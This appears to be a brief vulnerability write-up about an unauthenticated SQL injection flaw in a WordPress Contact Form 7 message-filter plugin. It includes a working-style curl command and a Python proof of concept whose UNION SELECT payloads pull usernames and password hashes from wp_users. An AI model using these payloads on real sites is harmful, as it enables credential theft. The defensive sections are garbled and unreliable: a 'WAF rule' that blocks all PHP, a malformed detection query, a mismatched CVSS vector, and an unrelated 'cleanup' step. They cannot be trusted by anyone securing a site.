How the CVE Works:
CVE-2025-46252 is an SQL injection vulnerability in the “kofimokome Message Filter for Contact Form 7” plugin (versions up to 1.6.3.2). The flaw arises due to improper sanitization of user-supplied input in SQL queries. Attackers can craft malicious payloads through contact form submissions, which are then executed directly in the database. This allows unauthorized access, data exfiltration, or manipulation of the WordPress database. The vulnerability is exploitable without authentication, making it critical.
DailyCVE Form:
Platform: WordPress
Version: ≤1.6.3.2
Vulnerability: SQL Injection
Severity: Critical
Date: 04/30/2025
What Undercode Say:
Analytics:
- Exploitability: High (no auth required)
- Attack Vector: Web-based (POST requests)
- Prevalence: ~50k+ installs
Exploit Commands:
curl -X POST "http://target.com/wp-admin/admin-ajax.php" -d "action=mfcf7_filter&data=1' UNION SELECT user_login,user_pass FROM wp_users-- -"
PoC Code (Python):
import requests
url = "http://victim.com/wp-admin/admin-ajax.php"
payload = {"action": "mfcf7_filter", "data": "1' UNION SELECT 1,concat(user_login,0x3a,user_pass) FROM wp_users-- -"}
r = requests.post(url, data=payload)
print(r.text)
Mitigation Steps:
1. Update to patched version >1.6.3.2.
2. Apply WAF rules blocking SQLi patterns:
location ~ .php$ { deny all; }
3. Input validation regex:
$input = preg_replace("/[^a-zA-Z0-9]/", "", $_POST['data']);
Detection (SQLi):
SELECT FROM wp_mfcf7_logs WHERE data LIKE '%--%';
Post-Exploit Cleanup:
DELETE FROM wp_options WHERE option_name LIKE '%transient%';
References:
- Patchstack Advisory: PS-2025-46252
- CWE-89: SQL Injection
- CVSS:4.0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
